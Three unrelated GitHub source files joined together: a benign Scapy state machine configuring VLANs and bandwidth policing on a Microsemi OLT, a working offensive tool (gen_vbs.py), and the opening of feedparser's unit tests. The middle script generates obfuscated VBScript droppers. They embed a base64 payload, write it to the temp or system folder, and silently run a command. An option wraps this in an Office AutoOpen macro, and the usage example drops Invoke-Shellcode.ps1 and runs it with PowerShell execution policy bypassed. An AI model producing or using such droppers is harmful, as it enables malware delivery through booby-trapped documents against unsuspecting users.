if self.retries < MAX_RETRIES:
self.retries += 1
self.send_set_vlan_downlink_configuration(self.device.device, self.svlan_id)
else:
raise self.error("Timeout for message PAS5211SetVlanDownConfigResponse")
@ATMT.receive_condition(wait_set_vlan_downlink_configuration_response)
def wait_for_set_vlan_downlink_configuration_response(self, pkt):
#log.debug('api-proxy-response')
if PAS5211SetVlanDownConfigResponse in pkt:
log.debug('[RESPONSE] PAS5211SetVlanDownConfigResponse')
self.send_set_downlink_vlan_handling(self.device.device, self.cvlan_id, self.svlan_id, self.port_id)
raise self.wait_set_downlink_vlan_handling_response()
else:
log.debug('Unexpected pkt {}'.format(pkt.summary()))
@ATMT.timeout(wait_set_downlink_vlan_handling_response, TIMEOUT)
def timeout_wait_set_downlink_vlan_handling_response(self):
#log.debug('api-proxy-timeout')
if self.retries < MAX_RETRIES:
self.retries += 1
self.send_set_downlink_vlan_handling(self.device.device, self.cvlan_id, self.svlan_id, self.port_id)
else:
raise self.error("Timeout for message PAS5211SetDownVlanHandlResponse")
@ATMT.receive_condition(wait_set_downlink_vlan_handling_response)
def wait_for_set_downlink_vlan_handling_response(self, pkt):
#log.debug('api-proxy-response')
if PAS5211SetDownVlanHandlResponse in pkt:
log.debug('[RESPONSE] PAS5211SetDownVlanHandlResponse')
self.send_get_port_id_downlink_policing(self.device.device, self.port_id)
raise self.wait_get_port_id_downlink_policing_response()
else:
log.debug('Unexpected pkt {}'.format(pkt.summary()))
@ATMT.timeout(wait_get_port_id_downlink_policing_response, TIMEOUT)
def timeout_wait_get_port_id_downlink_policing_response(self):
#log.debug('api-proxy-timeout')
if self.retries < MAX_RETRIES:
self.retries += 1
self.send_get_port_id_downlink_policing(self.device.device, self.port_id)
else:
raise self.error("Timeout for message PAS5211GetPortIdDownstreamPolicingConfigResponse")
@ATMT.receive_condition(wait_get_port_id_downlink_policing_response)
def wait_for_get_port_id_downlink_policing_response(self, pkt):
#log.debug('api-proxy-response')
if PAS5211GetPortIdDownstreamPolicingConfigResponse in pkt:
log.debug('[RESPONSE] PAS5211GetPortIdDownstreamPolicingConfigResponse')
if pkt[PAS5211GetPortIdDownstreamPolicingConfigResponse].ds_policing_config_id != PMC_OFAL_NO_POLICY:
self.policy_id = pkt[PAS5211GetPortIdDownstreamPolicingConfigResponse].ds_policing_config_id
log.debug('Policy id got: {}'.format(self.policy_id))
self.send_unset_port_id_downlink_policing(self.device.device, 1, self.port_id)
raise self.wait_unset_port_id_downlink_policing_response()
else:
self.send_set_downlink_policing(self.device.device,self.downlink_bandwidth)
raise self.wait_set_downlink_policing_response()
else:
log.debug('Unexpected pkt {}'.format(pkt.summary()))
@ATMT.timeout(wait_unset_port_id_downlink_policing_response, TIMEOUT)
def timeout_wait_unset_port_id_downlink_policing_response(self):
#log.debug('api-proxy-timeout')
if self.retries < MAX_RETRIES:
self.retries += 1
self.send_unset_port_id_downlink_policing(self.device.device, 1, self.port_id)
else:
raise self.error("Timeout for message PAS5211UnsetPortIdPolicingConfigResponse")
@ATMT.receive_condition(wait_unset_port_id_downlink_policing_response)
def wait_for_unset_port_id_downlink_policing_response(self, pkt):
#log.debug('api-proxy-response')
if PAS5211UnsetPortIdPolicingConfigResponse in pkt:
log.debug('[RESPONSE] PAS5211UnsetPortIdPolicingConfigResponse')
self.send_remove_downlink_policing(self.device.device, self.policy_id)
raise self.wait_remove_downlink_policing_response()
else:
log.debug('Unexpected pkt {}'.format(pkt.summary()))
@ATMT.timeout(wait_remove_downlink_policing_response, TIMEOUT)
def timeout_wait_remove_downlink_policing_response(self):
#log.debug('api-proxy-timeout')
if self.retries < MAX_RETRIES:
self.retries += 1
self.send_remove_downlink_policing(self.device.device, self.policy_id)
else:
raise self.error("Timeout for message PAS5211RemoveDownstreamPolicingConfigResponse")
@ATMT.receive_condition(wait_remove_downlink_policing_response)
def wait_for_remove_downlink_policing_response(self, pkt):
#log.debug('api-proxy-response')
if PAS5211RemoveDownstreamPolicingConfigResponse in pkt:
log.debug('[RESPONSE] PAS5211RemoveDownstreamPolicingConfigResponse')
self.send_set_downlink_policing(self.device.device, self.downlink_bandwidth)
raise self.wait_set_downlink_policing_response()
else:
log.debug('Unexpected pkt {}'.format(pkt.summary()))
@ATMT.timeout(wait_set_downlink_policing_response, TIMEOUT)
def timeout_wait_set_downlink_policing_response(self):
#log.debug('api-proxy-timeout')
if self.retries < MAX_RETRIES:
self.retries += 1
self.send_set_downlink_policing(self.device.device, self.downlink_bandwidth)
else:
raise self.error("Timeout for message PAS5211SetDownstreamPolicingConfigResponse")
@ATMT.receive_condition(wait_set_downlink_policing_response)
def wait_for_set_downlink_policing_response(self, pkt):
#log.debug('api-proxy-response')
if PAS5211SetDownstreamPolicingConfigResponse in pkt:
log.debug('[RESPONSE] PAS5211SetDownstreamPolicingConfigResponse')
# if pkt[PAS5211SetDownstreamPolicingConfigResponse].policing_config_id:
self.policy_id = pkt[PAS5211SetDownstreamPolicingConfigResponse].policing_config_id
log.debug('Policy id set: {}'.format(self.policy_id))
self.send_set_port_id_policing(self.device.device, 1, self.port_id, self.policy_id)
raise self.wait_set_port_id_policing_response()
else:
log.debug('Unexpected pkt {}'.format(pkt.summary()))
@ATMT.timeout(wait_set_port_id_policing_response, TIMEOUT)
def timeout_wait_set_port_id_policing_response(self):
#log.debug('api-proxy-timeout')
if self.retries < MAX_RETRIES:
self.retries += 1
self.send_set_port_id_policing(self.device.device, 1, self.port_id, self.policy_id)
else:
raise self.error("Timeout for message PAS5211SetPortIdPolicingConfigResponse")
@ATMT.receive_condition(wait_set_port_id_policing_response)
def wait_for_set_port_id_policing_response(self, pkt):
#log.debug('api-proxy-response')
if PAS5211SetPortIdPolicingConfigResponse in pkt:
log.debug('[RESPONSE] PAS5211SetPortIdPolicingConfigResponse')
raise self.end()
else:
log.debug('Unexpected pkt {}'.format(pkt.summary()))
def send_set_port_id_configuration(self, device, activate, port_id, alloc_id):
msg = PAS5211MsgSetPortIdConfig(
# port_id=1000 + device.proxy_address.onu_id,
port_id=port_id,
activate=activate,
alloc_id=alloc_id,
type=PON_PORT_TYPE_GEM,
destination=PON_PORT_DESTINATION_CNI0
)
self.send(self.px(msg))
log.debug("[SENT] PASS_set_port_id_configuration")
def send_get_onu_id_by_port_id(self, device, port_id):
msg = PAS5211MsgGetOnuIdByPortId(
# port_id=1000 + device.proxy_address.onu_id
port_id=port_id
)
self.send(self.px(msg))
log.debug("[SENT] PAS5211MsgGetOnuIdByPortId")
def send_set_gen_vlan_uplink_configuration(self, device):
# transmit "vlan uplink configuration port-id 1001 min-cos 0 max-cos 7
# de-bit disable primary-tag-handling true"
msg = PAS5211SetVlanGenConfig(
direction=0,
extended_svlan_type=33024,
insertion_svlan_ethertype=33024,
extended_cvlan_type=33024,
insertion_cvlan_ethertype=33024,
pon_pcp_code=3,
cni_pcp_code=3,
reserved=0,
)
self.send(self.px(msg))
log.debug("[SENT] PAS5211SetVlanGenConfig")
def send_set_gen_vlan_downlink_configuration(self, device):
# transmit "vlan uplink configuration port-id 1001 min-cos 0 max-cos 7
# de-bit disable primary-tag-handling true"
msg = PAS5211SetVlanGenConfig(
direction=1,
extended_svlan_type=33024,
insertion_svlan_ethertype=33024,
extended_cvlan_type=33024,
insertion_cvlan_ethertype=33024,
pon_pcp_code=3,
cni_pcp_code=3,
reserved=0,
)
self.send(self.px(msg))
log.debug("[SENT] PAS5211SetVlanGenConfig")
def send_set_vlan_uplink_configuration(self, device, port_id):
# transmit "vlan uplink configuration port-id 1001 min-cos 0 max-cos 7
# de-bit disable primary-tag-handling true"
msg = PAS5211SetVlanUplinkConfiguration(
# port_id=(1000 + device.proxy_address.onu_id),
port_id = port_id,
pvid_config_enabled=PON_TRUE,
# Enables handling of primary tag in addition to the port-id at
# uplink frames
min_cos=0, # The lower limit of the priority uplink frame from the specific Port Id can get
max_cos=7, # The upper limit of the priority uplink frame from the specific Port Id can get
de_bit=PON_DISABLE # Discard Eligibility (DE) enabled
)
self.send(self.px(msg))
log.debug("[SENT] PAS5211SetVlanUplinkConfiguration")
def send_set_uplink_vlan_handling(self, device, port_id, cvlan_id, svlan_id):
# if (ul_vlan_key->primary_vid == PON_VLAN_UNUSED_TAG)
# set_uplink_vlan_handling_msg.pvid_config_enabled = PON_FALSE;
# else
# {
# set_uplink_vlan_handling_msg.pvid_config_enabled = PON_TRUE;
# set_uplink_vlan_handling_msg.primary_vid = ul_vlan_key->primary_vid;
# }
primary_vid = 0 # TODO change
# self.port_id = (1000 + device.proxy_address.onu_id) # TODO change
if cvlan_id == PON_VLAN_UNUSED_TAG:
pvid_config_enabled = PON_FALSE
else:
pvid_config_enabled = PON_TRUE
primary_vid = cvlan_id
msg = PAS5211SetUplinkVlanHandl(
source_port_id=port_id,
primary_vid=primary_vid, # The primary VLAN tag of the uplink frame
pvid_config_enabled=pvid_config_enabled,
svlan_tag_operation=PON_VLAN_CHANGE_TAG,
cvlan_tag_operation=PON_VLAN_DONT_CHANGE_TAG, # Customer tag = new C-VLAN tag
new_svlan_tag=svlan_id, # Service tag to be added or replace, not relevant
new_cvlan_tag=0, # Customer tag to be added or replace, not relevant
destination=PON_VLAN_DEST_DATAPATH # Frames go to the CNI
)
self.send(self.px(msg))
log.debug("[SENT] PAS5211SetUplinkVlanHandl")
def send_set_svlan_at_configuration(self, device, svlan_id):
msg = PAS5211SetSVlanAtConfig(
svlan_id=svlan_id, # 9
# 1 1:1 VLAN mode is used, no address table
forwarding_mode=PON_1_TO_1_VLAN_MODE,
use_svlan=PON_FALSE, # Use S-VLAN as part of the address table key
use_cvlan=PON_FALSE, # Use C-VLAN as part of the address table key
use_pbits=PON_FALSE, # Use priority bits as part of the address table key
discard_unknown=PON_FALSE # Forward frames
)
self.send(self.px(msg))
log.debug("[SENT] PAS5211SetSVlanAtConfig")
def send_set_vlan_downlink_configuration(self, device, svlan_id):
msg = PAS5211SetVlanDownConfig(
svlan_id=svlan_id, # 9
double_tag_handling=PON_TRUE, # Enable handling according to double tag
vlan_priority_handling=PON_TRUE # Use VLAN priority at the downlink VLAN table key
)
self.send(self.px(msg))
log.debug("[SENT] PAS5211SetVlanDownConfig")
def send_get_port_id_downlink_policing(self, device, port_id):
msg = PAS5211GetPortIdDownstreamPolicingConfig(port_id=port_id)
self.send(self.px(msg))
log.debug("[SENT] PAS5211GetPortIdDownstreamPolicingConfig")
def send_remove_downlink_policing(self, device, policy_id):
msg = PAS5211RemoveDownstreamPolicingConfig(
policing_config_id=policy_id,
reserved=0)
self.send(self.px(msg))
log.debug("[SENT] PAS5211RemoveDownstreamPolicingConfig")
def send_unset_port_id_downlink_policing(self, device, dir, port_id):
msg = PAS5211UnsetPortIdPolicingConfig(direction=dir, port_id=port_id)
self.send(self.px(msg))
log.debug("[SENT] PAS5211UnsetPortIdPolicingConfig")
def send_set_downlink_policing(self, device, bandwidth):
msg = PAS5211SetDownstreamPolicingConfig(
committed_bandwidth = SLA_gr_bw_gros*1024,
excessive_bandwidth = (bandwidth - SLA_gr_bw_gros)*1024,
committed_burst_limit = 256,
excessive_burst_limit = 256)
self.send(self.px(msg))
log.debug("[SENT] PAS5211SetDownstreamPolicingConfig")
def send_set_port_id_policing(self, device, dir, port_id, policy_id):
msg = PAS5211SetPortIdPolicingConfig(
direction=dir,
port_id=port_id,
policing_config_id=policy_id,
reserved=0)
self.send(self.px(msg))
log.debug("[SENT] PAS5211SetPortIdPolicingConfig")
def send_send_dba_algorithm_msg(self, device, port_id, bandwidth):
alloc_id = []
mx_bw = []
gr_bw = []
data = pack('<LLHHBBBB', PYTHAGORAS_UPDATE_AID_SLA,
port_id, SLA_gr_bw_gros, bandwidth,
SLA_gr_bw_fine, SLA_be_bw_fine, PYTHAGORAS_DBA_DATA_COS,
PYTHAGORAS_DBA_STATUS_REPORT_NSR)
msg = PAS5211MsgSendDbaAlgorithmMsg(data= data)
self.send(self.px(msg))
log.debug("[SENT] PAS5211MsgSendDbaAlgorithmMsg")
def send_set_downlink_vlan_handling(self, device, cvlan_id, svlan_id, port_id):
cvlan_tag = 0
svlan_tag = svlan_id
if cvlan_id == PON_VLAN_UNUSED_TAG:
double_tag_handling = PON_FALSE
else:
double_tag_handling = PON_TRUE
cvlan_tag = cvlan_id
input_priority = 0 # TODO: Extract value from somewhere
if input_priority == PON_VLAN_UNUSED_PRIORITY:
priority_handling = PON_FALSE
else:
priority_handling = PON_TRUE
output_priority = 0 # TODO: Extract value from somewhere
if output_priority == PON_VLAN_REPLACE_PRIORITY:
output_vlan_prio_handle = PON_OUTPUT_VLAN_PRIO_HANDLE_INCOMING_VLAN
output_priority = 0
elif output_priority == PON_VLAN_UNCHANGED_PRIORITY:
output_vlan_prio_handle = PON_OUTPUT_VLAN_PRIO_HANDLE_DONT_CHANGE
output_priority = 0
else:
output_vlan_prio_handle = PON_OUTPUT_VLAN_PRIO_HANDLE_DL_VLAN_TABLE
msg = PAS5211SetDownVlanHandl(
svlan_tag=svlan_tag,
cvlan_tag=cvlan_tag, # Original downlink frame with this C-tag ID
double_tag_handling=PON_TRUE,
priority_handling=PON_FALSE,
input_priority=1, # From traces # S-VLAN priority field
# Don't change original frame service tag
svlan_tag_operation=PON_DL_VLAN_SVLAN_REMOVE,
cvlan_tag_operation=PON_DL_VLAN_CVLAN_NO_CHANGE, # Customer tag = new C-VLAN tag
# port_id=(1000 + device.proxy_address.onu_id),
port_id=port_id,
# GEM port-id destination of the downlink frame. It is used when
# the MAC destination address (DA) is a broadcast address
new_cvlan_tag=cvlan_tag, # Same as cvlan_tag
# From traces PON_VLAN_DEST_DATAPATH, # Frames go to the PON
destination=PON_VLAN_DEST_DATAPATH,
output_vlan_prio_handle=PON_OUTPUT_VLAN_PRIO_HANDLE_DONT_CHANGE,
output_priority=1 # New VLAN priority value
)
self.send(self.px(msg))
log.debug("[SENT] PAS5211SetDownVlanHandl")
|
{
"content_hash": "aaea026f0229f0045f5c330b39cf7b75",
"timestamp": "",
"source": "github",
"line_count": 711,
"max_line_length": 176,
"avg_line_length": 45.17862165963432,
"alnum_prop": 0.6630346802814271,
"repo_name": "opencord/voltha",
"id": "8a529bcfda850ea1237b5733a5669bf998a9dcb5",
"size": "32722",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "voltha/adapters/microsemi_olt/OltInstallFlowStateMachine.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "30265"
},
{
"name": "Dockerfile",
"bytes": "2881"
},
{
"name": "Go",
"bytes": "181529"
},
{
"name": "Jinja",
"bytes": "25855"
},
{
"name": "Makefile",
"bytes": "76329"
},
{
"name": "Python",
"bytes": "9758796"
},
{
"name": "RobotFramework",
"bytes": "10188"
},
{
"name": "Ruby",
"bytes": "1126"
},
{
"name": "Shell",
"bytes": "758475"
},
{
"name": "XSLT",
"bytes": "175917"
}
],
"symlink_target": ""
}
|
import argparse
import random
import re
import sys
import binascii
class vbs_gen:
def __init__(self, args):
self.vb_code = ""
self.args = args
if not args.cmd and not args.writeFilePath:
sys.stderr.write("Error: must execute a command or write a file (or both). See --help")
self.create_vartable()
self.genvbs_header()
self.genvbs_getTemp()
if self.args.inputFile:
self.genvbs_writefile()
if self.args.cmd:
self.genvbs_execfile()
self.genvbs_invokecode()
print self.vb_code
#returns a random lowercase letter of a given length
def rand_alpha(self, strlength=10):
word = ""
for i in range(0,strlength):
word += chr(random.randint(0x61, 0x7a))
return word
def create_vartable(self):
self.var_dict = {}
#randomized vbscript variables to make the output slightly less intuitive to read
self.var_dict['base64'] = self.rand_alpha()
self.var_dict['binaryStream'] = self.rand_alpha()
self.var_dict['cmd'] = self.rand_alpha()
self.var_dict['colEnvironment'] = self.rand_alpha()
self.var_dict['decodeBase64'] = self.rand_alpha()
self.var_dict['envObj'] = self.rand_alpha()
self.var_dict['execfile'] = self.rand_alpha()
self.var_dict['getVar'] = self.rand_alpha()
self.var_dict['objshell'] = self.rand_alpha()
self.var_dict['objPath'] = self.rand_alpha()
self.var_dict['runObj'] = self.rand_alpha()
self.var_dict['sc'] = self.rand_alpha()
self.var_dict['sysPath'] = self.rand_alpha()
self.var_dict['tempPath'] = self.rand_alpha()
self.var_dict['writeBytes'] = self.rand_alpha()
self.var_dict['writeFile'] = self.rand_alpha()
def getvar(self, var):
if var not in self.var_dict:
raise Exception("Bad variable")
if self.args.debug:
return var
else:
return self.var_dict[var]
def genvbs_header(self):
self.vb_code += """
Option Explicit
Const TypeBinary = 1
Const ForReading = 1, ForWriting = 2, ForAppending = 8
"""
def genvbs_getTemp(self):
self.vb_code += "\n"
self.vb_code += "Private Function " + self.getvar("getVar") + "(mvar)\n"
self.vb_code += " Dim " + self.getvar("objshell") + "\n"
self.vb_code += " Dim " + self.getvar("envObj") + "\n"
self.vb_code += " Set " + self.getvar("objshell") + " = CreateObject(\"WScript.Shell\")\n"
self.vb_code += " Set " + self.getvar("envObj") + " = " + self.getvar("objshell") + ".Environment(\"PROCESS\")\n"
self.vb_code += " " + self.getvar("getVar") + " = " + self.getvar("envObj") + "(mvar)\n"
self.vb_code += "End Function\n"
#creates a few functions, most useful is 'writeFile' sub
def genvbs_writefile(self):
#decode base64 and writeBytes functions
self.vb_code += "\n"
self.vb_code += "Private Function " + self.getvar("decodeBase64") + "(" + self.getvar("base64") + ")\n"
self.vb_code += " Dim DM, EL\n"
self.vb_code += " Set DM = CreateObject(\"Microsoft.XMLDOM\")\n"
self.vb_code += " Set EL = DM.createElement(\"tmp\")\n"
self.vb_code += " EL.DataType = \"bin.base64\"\n"
self.vb_code += " EL.Text = " + self.getvar("base64") + "\n"
self.vb_code += " " + self.getvar("decodeBase64") + " = EL.NodeTypedValue\n"
self.vb_code += "End Function\n"
self.vb_code += "\n"
self.vb_code += "Private Sub " + self.getvar("writeBytes") + "(file, bytes)\n"
self.vb_code += " Dim " + self.getvar("binaryStream") + "\n"
self.vb_code += " Set " + self.getvar("binaryStream") + " = CreateObject(\"ADODB.Stream\")\n"
self.vb_code += " " + self.getvar("binaryStream") + ".Type = TypeBinary\n"
self.vb_code += " " + self.getvar("binaryStream") + ".Open\n"
self.vb_code += " " + self.getvar("binaryStream") + ".Write bytes\n"
self.vb_code += " " + self.getvar("binaryStream") + ".SaveToFile file, ForWriting\n"
self.vb_code += "End Sub\n"
self.vb_code += "\n"
shellcode = open(self.args.inputFile, 'rb').read()
b64_shell = shellcode.encode("base64").split("\n")
sc_str = " Dim " + self.getvar("sc") + "\n"
for line in b64_shell:
if line == "":
continue
sc_str += " " + self.getvar("sc") + " = " + self.getvar("sc") + " & \"" + line + "\"\n"
self.vb_code += "Private Sub " + self.getvar("writeFile") + "()\n "
self.vb_code += sc_str +"\n"
self.vb_code += " Dim decbytes\n"
self.vb_code += " decbytes = " + self.getvar("decodeBase64") + "(" + self.getvar("sc") + ")\n"
self.vb_code += " Dim outFile\n"
self.vb_code += " outFile = \"" + self.args.writeFilePath + "\"\n"
self.vb_code += "\n"
self.vb_code += " outFile = UCase(outFile)\n"
self.vb_code += " outFile = Replace(outFile,\"%TEMP%\", " + self.getvar("getVar") + "(\"temp\"))\n"
self.vb_code += " outFile = Replace(outFile,\"%SYSTEMROOT%\", " + self.getvar("getVar") + "(\"windir\"))\n"
self.vb_code += " " + self.getvar("writeBytes") + " outFile, decbytes\n"
self.vb_code += "End Sub\n"
self.vb_code += "\n"
def genvbs_execfile(self):
self.vb_code += "Private Sub " + self.getvar("execfile") + "()\n"
self.vb_code += " Dim " + self.getvar("cmd") + "\n"
self.vb_code += " " + self.getvar("cmd") + " = \"" + self.args.cmd + "\"\n"
self.vb_code += " " + self.getvar("cmd") + " = Replace(" + self.getvar("cmd") + ", \"%TEMP%\", " + self.getvar("getVar") + "(\"temp\"))\n"
self.vb_code += " " + self.getvar("cmd") + " = Replace(" + self.getvar("cmd") + ", \"%SYSTEMROOT%\", " + self.getvar("getVar") + "(\"windir\"))\n"
self.vb_code += " Dim " + self.getvar("runObj") + "\n"
self.vb_code += " Set " + self.getvar("runObj") + " = CreateObject(\"Wscript.Shell\")\n"
self.vb_code += " " + self.getvar("runObj") + ".run " + self.getvar("cmd") + ", 0, true\n"
self.vb_code += "End Sub\n"
self.vb_code += " \n"
def genvbs_invokecode(self):
self.vb_code += "\n"
#wrap call in AutopOpen function
if self.args.office:
self.vb_code += "Sub AutoOpen()\n"
if self.args.inputFile:
self.vb_code += self.getvar("writeFile") + "\n"
if self.args.cmd:
self.vb_code += self.getvar("execfile") + "\n"
if self.args.office:
self.vb_code += "End Sub\n"
desc = """simple script that generates vbs files that upload binaries and execute things
%TEMP% and %SYSTEMROOT% (case sensative) can be used"""
examples = """
Example:
python gen_vbs.py --cmd="C:\\Windows\\System32\\calc.exe"
Example:
python gen_vbs.py --inputFile ./Invoke-Shellcode.ps1 --writeFilePath="%TEMP%\\invoke_ping.ps1" \\
--cmd="%SYSTEMROOT%\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe -executionpolicy bypass \\
%TEMP%\\invoke_ping.ps1"
"""
parser = argparse.ArgumentParser(description=desc, epilog=examples, formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument('--cmd', required=False, help='command to run, including args (e.g. "cmd.exe /K dir")')
parser.add_argument('--debug', action="store_true", help='does not obfuscate variable names, so output is easier to read')
parser.add_argument('--office', action="store_true", help='Wraps main in an AutoOpen function that is called when a doc is opened')
parser.add_argument('--inputFile', required=False, help="Local Filename that will be written to host. If null nothing is written")
parser.add_argument('--writeFilePath', default=".\\ping.ps1", required=False, help='Name to write File')
args = parser.parse_args()
vbs_gen(args)
|
{
"content_hash": "3d6a612e8d3ceac3eb3e42bdb9cd0dce",
"timestamp": "",
"source": "github",
"line_count": 177,
"max_line_length": 149,
"avg_line_length": 41.5819209039548,
"alnum_prop": 0.6188858695652174,
"repo_name": "zigitax/webstersprodigy",
"id": "f0b75a40179daf371bd04bcd0ffd5805513f8a7d",
"size": "7496",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "misc/gen_vbs.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "643"
},
{
"name": "Python",
"bytes": "61737"
}
],
"symlink_target": ""
}
|
__author__ = "Mark Pilgrim <http://diveintomark.org/>"
__license__ = """
Copyright (c) 2010-2012 Kurt McKee <contactme@kurtmckee.org>
Copyright (c) 2004-2008 Mark Pilgrim
All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS 'AS IS'
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE."""
import codecs
import datetime
import glob
import operator
import os
import posixpath
import pprint
import re
import struct
import sys
import threading
import time
import unittest
import urllib
import warnings
import zlib
import BaseHTTPServer
import SimpleHTTPServer
import feedparser
if not feedparser._XML_AVAILABLE:
sys.stderr.write('No XML parsers available, unit testing can not proceed\n')
sys.exit(1)
try:
# the utf_32 codec was introduced in Python 2.6; it's necessary to
# check this as long as feedparser supports Python 2.4 and 2.5
codecs.lookup('utf_32')
except LookupError:
_UTF32_AVAILABLE = False
else:
_UTF32_AVAILABLE = True
_s2bytes = feedparser._s2bytes
_l2bytes = feedparser._l2bytes
#---------- custom HTTP server (used to serve test feeds) ----------
_PORT = 8097 # not really configurable, must match hardcoded port in tests
_HOST = '127.0.0.1' # also not really configurable
class FeedParserTestRequestHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
headers_re = re.compile(_s2bytes(r"^Header:\s+([^:]+):(.+)$"), re.MULTILINE)
def send_head(self):
"""Send custom headers defined in test case
Example:
<!--
Header: Content-type: application/atom+xml
Header: X-Foo: bar
-->
"""
# Short-circuit the HTTP status test `test_redirect_to_304()`
if self.path == '/-/return-304.xml':
self.send_response(304)
self.send_header('Content-type', 'text/xml')
self.end_headers()
return feedparser._StringIO(u''.encode('utf-8'))
path = self.translate_path(self.path)
# the compression tests' filenames determine the header sent
if self.path.startswith('/tests/compression'):
if self.path.endswith('gz'):
headers = {'Content-Encoding': 'gzip'}
else:
headers = {'Content-Encoding': 'deflate'}
headers['Content-type'] = 'application/xml'
else:
headers = dict([(k.decode('utf-8'), v.decode('utf-8').strip()) for k, v in self.headers_re.findall(open(path, 'rb').read())])
f = open(path, 'rb')
if (self.headers.get('if-modified-since') == headers.get('Last-Modified', 'nom')) \
or (self.headers.get('if-none-match') == headers.get('ETag', 'nomatch')):
status = 304
else:
status = 200
headers.setdefault('Status', status)
self.send_response(int(headers['Status']))
headers.setdefault('Content-type', self.guess_type(path))
self.send_header("Content-type", headers['Content-type'])
self.send_header("Content-Length", str(os.stat(f.name)[6]))
for k, v in headers.items():
if k not in ('Status', 'Content-type'):
self.send_header(k, v)
self.end_headers()
return f
def log_request(self, *args):
pass
class FeedParserTestServer(threading.Thread):
"""HTTP Server that runs in a thread and handles a predetermined number of requests"""
def __init__(self, requests):
threading.Thread.__init__(self)
self.requests = requests
self.ready = threading.Event()
def run(self):
self.httpd = BaseHTTPServer.HTTPServer((_HOST, _PORT), FeedParserTestRequestHandler)
self.ready.set()
while self.requests:
self.httpd.handle_request()
self.requests -= 1
self.ready.clear()
#---------- dummy test case class (test methods are added dynamically) ----------
unicode1_re = re.compile(_s2bytes(" u'"))
unicode2_re = re.compile(_s2bytes(' u"'))
# _bytes is only used in everythingIsUnicode().
# In Python 2 it's str, and in Python 3 it's bytes.
_bytes = type(_s2bytes(''))
def everythingIsUnicode(d):
"""Takes a dictionary, recursively verifies that every value is unicode"""
for k, v in d.iteritems():
if isinstance(v, dict) and k != 'headers':
if not everythingIsUnicode(v):
return False
elif isinstance(v, list):
for i in v:
if isinstance(i, dict) and not everythingIsUnicode(i):
return False
elif isinstance(i, _bytes):
return False
elif isinstance(v, _bytes):
return False
return True
def failUnlessEval(self, xmlfile, evalString, msg=None):
"""Fail unless eval(evalString, env)"""
env = feedparser.parse(xmlfile)
try:
if not eval(evalString, globals(), env):
failure=(msg or 'not eval(%s) \nWITH env(%s)' % (evalString, pprint.pformat(env)))
raise self.failureException, failure
if not everythingIsUnicode(env):
raise self.failureException, "not everything is unicode \nWITH env(%s)" % (pprint.pformat(env), )
except SyntaxError:
# Python 3 doesn't have the `u""` syntax, so evalString needs to be modified,
# which will require the failure message to be updated
evalString = re.sub(unicode1_re, _s2bytes(" '"), evalString)
evalString = re.sub(unicode2_re, _s2bytes(' "'), evalString)
if not eval(evalString, globals(), env):
failure=(msg or 'not eval(%s) \nWITH env(%s)' % (evalString, pprint.pformat(env)))
raise self.failureException, failure
class BaseTestCase(unittest.TestCase):
failUnlessEval = failUnlessEval
class TestCase(BaseTestCase):
pass
class TestTemporaryFallbackBehavior(unittest.TestCase):
"These tests are temporarily here because of issues 310 and 328"
def test_issue_328_fallback_behavior(self):
warnings.filterwarnings('error')
d = feedparser.FeedParserDict()
d['published'] = u'pub string'
d['published_parsed'] = u'pub tuple'
d['updated'] = u'upd string'
d['updated_parsed'] = u'upd tuple'
# Ensure that `updated` doesn't map to `published` when it exists
self.assertTrue('published' in d)
self.assertTrue('published_parsed' in d)
self.assertTrue('updated' in d)
self.assertTrue('updated_parsed' in d)
self.assertEqual(d['published'], 'pub string')
self.assertEqual(d['published_parsed'], 'pub tuple')
self.assertEqual(d['updated'], 'upd string')
self.assertEqual(d['updated_parsed'], 'upd tuple')
d = feedparser.FeedParserDict()
d['published'] = u'pub string'
d['published_parsed'] = u'pub tuple'
# Ensure that `updated` doesn't actually exist
self.assertTrue('updated' not in d)
self.assertTrue('updated_parsed' not in d)
# Ensure that accessing `updated` throws a DeprecationWarning
try:
d['updated']
except DeprecationWarning:
# Expected behavior
pass
else:
# Wrong behavior
self.assertEqual(True, False)
try:
d['updated_parsed']
except DeprecationWarning:
# Expected behavior
pass
else:
# Wrong behavior
self.assertEqual(True, False)
# Ensure that `updated` maps to `published`
warnings.filterwarnings('ignore')
self.assertEqual(d['updated'], u'pub string')
self.assertEqual(d['updated_parsed'], u'pub tuple')
warnings.resetwarnings()
class TestEverythingIsUnicode(unittest.TestCase):
"Ensure that `everythingIsUnicode()` is working appropriately"
def test_everything_is_unicode(self):
self.assertTrue(everythingIsUnicode(
{'a': u'a', 'b': [u'b', {'c': u'c'}], 'd': {'e': u'e'}}
))
def test_not_everything_is_unicode(self):
self.assertFalse(everythingIsUnicode({'a': _s2bytes('a')}))
self.assertFalse(everythingIsUnicode({'a': [_s2bytes('a')]}))
self.assertFalse(everythingIsUnicode({'a': {'b': _s2bytes('b')}}))
self.assertFalse(everythingIsUnicode({'a': [{'b': _s2bytes('b')}]}))
class TestLooseParser(BaseTestCase):
